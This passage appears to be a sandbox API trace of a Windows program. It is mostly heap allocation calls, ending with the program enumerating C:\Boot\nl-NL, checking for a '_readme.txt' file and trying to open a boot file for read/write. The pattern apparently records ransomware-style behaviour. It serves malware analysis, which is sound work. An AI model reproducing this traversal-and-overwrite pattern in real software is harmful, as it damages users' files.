lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.111] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.114] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.114] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.114] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.114] PathFindFileNameW (pszPath="") returned="" [0093.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.114] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.115] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.115] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.116] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0093.116] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.116] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0093.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.117] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c75c0 [0093.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.117] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.117] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.117] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0093.117] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.117] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33989a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.117] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned=".txt" [0093.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.117] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33989a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.118] FindClose (in: hFindFile=0x31c75c0 | out: hFindFile=0x31c75c0) returned 1 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.118] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.118] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 